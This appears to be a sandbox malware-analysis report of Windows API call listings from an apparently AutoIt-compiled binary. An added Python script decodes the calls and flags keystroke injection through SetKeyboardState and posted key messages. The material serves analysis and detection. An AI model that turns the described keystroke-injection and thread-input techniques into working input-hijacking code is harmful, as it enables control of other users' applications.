                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                                        • Opcode ID: 883833ede937179d985b1dce38a469e4c7b4d491ac191c430ad82ce155a82e0c
                                                                                                                                                                        • Instruction ID: ac0e3a7981f2154b8191e2ce0692a7142001632849ba8a9028a778e2880cb8a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 883833ede937179d985b1dce38a469e4c7b4d491ac191c430ad82ce155a82e0c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0231B171110214BFEB118F50DC49FFB7BAEEF097A1F040025FE089A191C6B59C51CBA0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                                        • Opcode ID: 54524b9ed97290208ed0188e9d2565dec7fa5e57811f1e80245252a4a24fe4cd
                                                                                                                                                                        • Instruction ID: d7358529cbe3d38114b37c8de8a7f691196a055e32bf9a3db9a697e4114e2eb4
                                                                                                                                                                        • Opcode Fuzzy Hash: 54524b9ed97290208ed0188e9d2565dec7fa5e57811f1e80245252a4a24fe4cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED10171A6065A9FDF10CF69C884BAEB7B5FF48308F548169E905AB280E770DD51CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002A194E
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A19D1
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002A1B7B,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A1A64
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A1A7B
                                                                                                                                                                          • Part of subcall function 00293B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A1AF7
                                                                                                                                                                        • __freea.LIBCMT ref: 002A1B22
                                                                                                                                                                        • __freea.LIBCMT ref: 002A1B2E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                                                        • Opcode ID: 8477eff95c5bfce938dde0b67f1b877a01eea47f846c329ff87c981a492c8cbb
                                                                                                                                                                        • Instruction ID: e2bcf290ffa1e48798c0572c7f099f8644fb2058732f42e82cb03ff96cc4fdad
                                                                                                                                                                        • Opcode Fuzzy Hash: 8477eff95c5bfce938dde0b67f1b877a01eea47f846c329ff87c981a492c8cbb
                                                                                                                                                                        • Instruction Fuzzy Hash: D791A371E202179BDF248E64C891AEEBBA5AF0A324F180569E805E7181EF35DD74CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                                                        • Opcode ID: fc74128cb5c4ba0f758e37df7472cc5df85e8ca85aa733ba1137f11c857b6c20
                                                                                                                                                                        • Instruction ID: b6cfd7138bd340cd7ef83dad2ea6993be7fedc4918320c6f510756790a16f925
                                                                                                                                                                        • Opcode Fuzzy Hash: fc74128cb5c4ba0f758e37df7472cc5df85e8ca85aa733ba1137f11c857b6c20
                                                                                                                                                                        • Instruction Fuzzy Hash: 2091C470A60665AFDF20CFA6DC44FAEBBB8EF45718F108519F509AB280D7709951CFA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 002D1C1B
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1C43
                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 002D1C67
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1C97
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1D1E
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1D83
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1DEF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                                                        • Opcode ID: dec737842a5f71724a4d18648d338f8832203518f0b4a850d95304fc35b45d34
                                                                                                                                                                        • Instruction ID: 79c28cfe60f45b7af98101299f784da70332633d764e28bf1e32c85481068700
                                                                                                                                                                        • Opcode Fuzzy Hash: dec737842a5f71724a4d18648d338f8832203518f0b4a850d95304fc35b45d34
                                                                                                                                                                        • Instruction Fuzzy Hash: D391DF75A20219AFDB009F94C885BBEB7B5FF04725F104027E940AB7A1D774AD60CF91
                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002E43C8
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002E44D7
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E44E7
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002E467C
                                                                                                                                                                          • Part of subcall function 002D169E: VariantInit.OLEAUT32(00000000), ref: 002D16DE
                                                                                                                                                                          • Part of subcall function 002D169E: VariantCopy.OLEAUT32(?,?), ref: 002D16E7
                                                                                                                                                                          • Part of subcall function 002D169E: VariantClear.OLEAUT32(?), ref: 002D16F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                                                        • Opcode ID: 9f72d5508ab7d37ff6b067623d6e789bd6c53490567c5877eb7a195df305e3a4
                                                                                                                                                                        • Instruction ID: d0c99e911b2073af76637b67490b932127d92daabdf5f8fdc8efa3ccde58a78b
                                                                                                                                                                        • Opcode Fuzzy Hash: 9f72d5508ab7d37ff6b067623d6e789bd6c53490567c5877eb7a195df305e3a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C9156746283429FC700EF25C48496AB7E5BF89314F54892DF8898B351DB31ED55CF82
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?,?,002C0C4E), ref: 002C091B
                                                                                                                                                                          • Part of subcall function 002C08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0936
                                                                                                                                                                          • Part of subcall function 002C08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0944
                                                                                                                                                                          • Part of subcall function 002C08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?), ref: 002C0954
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002E56AE
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E57B6
                                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 002E582C
                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 002E5837
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                                                        • Opcode ID: b702f7ea319765aef7411e3a9f09d8ea627892e180e7840e5a914bd7a5f28863
                                                                                                                                                                        • Instruction ID: 84e9fbe89f1dfa984a5ba142de4f30de29d505a2f5e60a55b500a058ad7af448
                                                                                                                                                                        • Opcode Fuzzy Hash: b702f7ea319765aef7411e3a9f09d8ea627892e180e7840e5a914bd7a5f28863
                                                                                                                                                                        • Instruction Fuzzy Hash: A0913971D20269EFDF11DFA4D880EEDB7B9BF08304F504169E915A7251EB709AA4CF60
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenu.USER32(?), ref: 002F2C1F
                                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 002F2C51
                                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002F2C79
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F2CAF
                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 002F2CE9
                                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 002F2CF7
                                                                                                                                                                          • Part of subcall function 002C4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C43AD
                                                                                                                                                                          • Part of subcall function 002C4393: GetCurrentThreadId.KERNEL32 ref: 002C43B4
                                                                                                                                                                          • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002F2D7F
                                                                                                                                                                          • Part of subcall function 002CF292: Sleep.KERNEL32 ref: 002CF30A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                                                        • Opcode ID: 110f5b186ea4a57f0b48c00a275e620d4bb9e4d1836adb5c84f4d8096a267d72
                                                                                                                                                                        • Instruction ID: 7cf8c49455fc49d0beba302b9c62bcb8ba122682134dedc07317ca7215a0ff4b
                                                                                                                                                                        • Opcode Fuzzy Hash: 110f5b186ea4a57f0b48c00a275e620d4bb9e4d1836adb5c84f4d8096a267d72
                                                                                                                                                                        • Instruction Fuzzy Hash: 5871BE75A10209EFCB00EF64C885ABEBBB5EF49360F118469E916EB351DB34AD51CF90
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(?), ref: 002CB8C0
                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 002CB8D5
                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 002CB936
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 002CB964
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 002CB983
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 002CB9C4
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002CB9E7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                        • Opcode ID: 4e35e66ce2c980ce2ef74d65885ef461a6a01660a1ba80d5b91295a67ec9413e
                                                                                                                                                                        • Instruction ID: 59f6fb5e92c02e122d74709acd3f3a13a2900391f75a36c811bb52d809abe017
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e35e66ce2c980ce2ef74d65885ef461a6a01660a1ba80d5b91295a67ec9413e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F51F4A05647D63DFB374A348C46FB6BEA95F06304F08868DE1D5458D2C3E8ACE4DB50
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(00000000), ref: 002CB6E0
                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 002CB6F5
                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 002CB756
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002CB782
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002CB79F
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002CB7DE
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002CB7FF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                        • Opcode ID: f26d58cfbe81c94cba81a7c61860cbfc0f6312a5387982895366e3f5a0728c54
                                                                                                                                                                        • Instruction ID: 2058e08db0a596daed79453924957bc47b5561e9a9dc6dba0ae1c87de2aedbf1
                                                                                                                                                                        • Opcode Fuzzy Hash: f26d58cfbe81c94cba81a7c61860cbfc0f6312a5387982895366e3f5a0728c54
                                                                                                                                                                        • Instruction Fuzzy Hash: AC5124A19287D63DFB338B34CC56F76BE995B01304F08868DE5D95A8C2D394ECA8DB50
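The raw API listings above are hard to read because message IDs, virtual-key codes and COM flags appear only as hex. The two GetKeyboardState/SetKeyboardState/PostMessageW functions post WM_KEYUP (0x101) and WM_KEYDOWN (0x100) for VK_SHIFT (0x10), VK_CONTROL (0x11), VK_MENU (0x12) and VK_LWIN (0x5B) after rewriting the keyboard state, which is the shape of synthetic keystroke injection into another window; the COM function earlier calls CoInitializeSecurity with authentication level 2 (RPC_C_AUTHN_LEVEL_CONNECT) and impersonation level 3 (RPC_C_IMP_LEVEL_IMPERSONATE) and CoCreateInstanceEx with CLSCTX 0x15. The following Python is an added example, not code from Joe Sandbox, AutoIt or the analysed sample: it parses listing lines of the format shown on this page (the exact line layout is an assumption), decodes those documented Win32/COM constants, and flags the keyboard-state-then-PostMessage sequence. The sample lines are constructed from the listings above.

```python
"""Decode Joe Sandbox style API-trace lines and flag synthetic keystroke injection.

Added example; the line format is assumed from the listing on this page and the
constants are the documented Windows SDK values.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample, copied in shape from the listings above (assumed layout).
SAMPLE = """\
• GetParent.USER32(?), ref: 002CB8C0
• GetKeyboardState.USER32(?), ref: 002CB8D5
• SetKeyboardState.USER32(?), ref: 002CB936
• PostMessageW.USER32(?,00000101,00000010,?), ref: 002CB964
• PostMessageW.USER32(?,00000101,00000011,?), ref: 002CB983
• PostMessageW.USER32(?,00000101,00000012,?), ref: 002CB9C4
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 002CB9E7
  • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
• _wcslen.LIBCMT ref: 002E57B6
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002E56AE
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 002E582C
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002F2D7F
"""

# One listing line: optional "Part of subcall" prefix, API.MODULE, optional arg list, ref address.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Documented SDK constants (winuser.h, rpcdce.h, wtypesbase.h).
WM = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
AUTHN = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE", 2: "RPC_C_AUTHN_LEVEL_CONNECT",
         3: "RPC_C_AUTHN_LEVEL_CALL", 4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
         6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS", 2: "RPC_C_IMP_LEVEL_IDENTIFY",
       3: "RPC_C_IMP_LEVEL_IMPERSONATE", 4: "RPC_C_IMP_LEVEL_DELEGATE"}
CLSCTX = [(0x1, "CLSCTX_INPROC_SERVER"), (0x2, "CLSCTX_INPROC_HANDLER"),
          (0x4, "CLSCTX_LOCAL_SERVER"), (0x10, "CLSCTX_REMOTE_SERVER")]


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None for an unresolved "?" argument
    ref: int
    subcall: Optional[str]      # address of the subcall function, if it was one


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)   # "-C000001E" parses as a negative value


def parse(text: str) -> List[Call]:
    """Turn listing lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_arg(t) for t in raw.split(",")] if raw is not None else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub")))
    return calls


def decode_clsctx(flags: int) -> List[str]:
    return [name for bit, name in CLSCTX if flags & bit]


def describe(c: Call) -> str:
    """Human-readable form of the calls whose numeric arguments carry meaning."""
    a = c.args
    if c.api == "PostMessageW" and len(a) >= 3 and a[1] is not None:
        msg = WM.get(a[1], f"0x{a[1]:04X}")
        if a[1] in (0x0100, 0x0101) and a[2] is not None:      # wParam is the virtual-key code
            return f"{c.api}: {msg} {VK.get(a[2], f'vk=0x{a[2]:02X}')}"
        return f"{c.api}: {msg}"
    if c.api == "CoInitializeSecurity" and len(a) >= 6 and None not in (a[4], a[5]):
        return f"{c.api}: authn={AUTHN.get(a[4], a[4])} imp={IMP.get(a[5], a[5])}"
    if c.api == "CoCreateInstanceEx" and len(a) >= 3 and a[2] is not None:
        return f"{c.api}: clsctx={'|'.join(decode_clsctx(a[2]))}"
    return c.api


def find_synthetic_keystrokes(calls: List[Call]) -> List[str]:
    """Keys posted as WM_KEYDOWN/WM_KEYUP after the process rewrote the keyboard state.

    SetKeyboardState followed by PostMessageW key messages is the shape of keystroke
    injection into another window's queue; an empty list means the pattern is absent.
    """
    state_rewritten = False
    keys = []
    for c in calls:
        if c.api == "SetKeyboardState":
            state_rewritten = True
        elif state_rewritten and c.api == "PostMessageW" and len(c.args) >= 3 and c.args[1] in (0x0100, 0x0101):
            keys.append("?" if c.args[2] is None else VK.get(c.args[2], f"vk=0x{c.args[2]:02X}"))
    return keys


if __name__ == "__main__":
    parsed = parse(SAMPLE)
    for call in parsed:
        print(f"{call.ref:08X}  {describe(call)}")
    print("synthetic keystrokes:", find_synthetic_keystrokes(parsed))
```

Run against the listing, the decoder shows the two keyboard functions posting only modifier keys (Shift, Ctrl, Alt, Win) in the same order, once as WM_KEYUP and once as WM_KEYDOWN, which is what a key-state reset before and after automated input looks like; the AttachThreadInput subcall in the menu function is the usual companion, since it lets the caller share the target window's input state.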
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00295F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002957E3
                                                                                                                                                                        • __fassign.LIBCMT ref: 0029585E
                                                                                                                                                                        • __fassign.LIBCMT ref: 00295879
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0029589F
                                                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00295F16,00000000,?,?,?,?,?,?,?,?,?,00295F16,?), ref: 002958BE
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00295F16,00000000,?,?,?,?,?,?,?,?,?,00295F16,?), ref: 002958F7
                                                                                                                                                                        Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
